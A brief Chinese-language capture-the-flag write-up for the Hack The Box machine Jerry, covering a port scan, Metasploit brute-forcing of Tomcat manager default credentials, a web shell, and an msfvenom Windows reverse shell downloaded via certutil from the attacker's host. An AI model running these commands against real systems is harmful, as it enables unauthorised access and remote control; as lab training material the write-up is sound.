当前位置: 首页 > 資訊 >

[Day26] HTB Jerry

Scan

  • 掃 Port
    • rustscan -a 10.129.1.110 -r 1-65535
    • 發現有開8080

Brute Force

  • 嘗試 msf 爆破
    • auxiliary/scanner/http/tomcat_mgr_login
    • 發現密碼是 tomcat:s3cret
  • Wordlist
    • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
    • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt

進入 Manager APP

  • 發現不登入直接按 Manager App 就可以進後台ㄌ= =

Web shell

Reverse shell

  • 準備 Reverse shell
    • msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe > shell.exe
  • 下載 reverse shell
    • certutil -urlcache -f http://10.10.16.35/shell.exe shell8787.exe
  • 執行 Reverse shell
  • 取得 Flag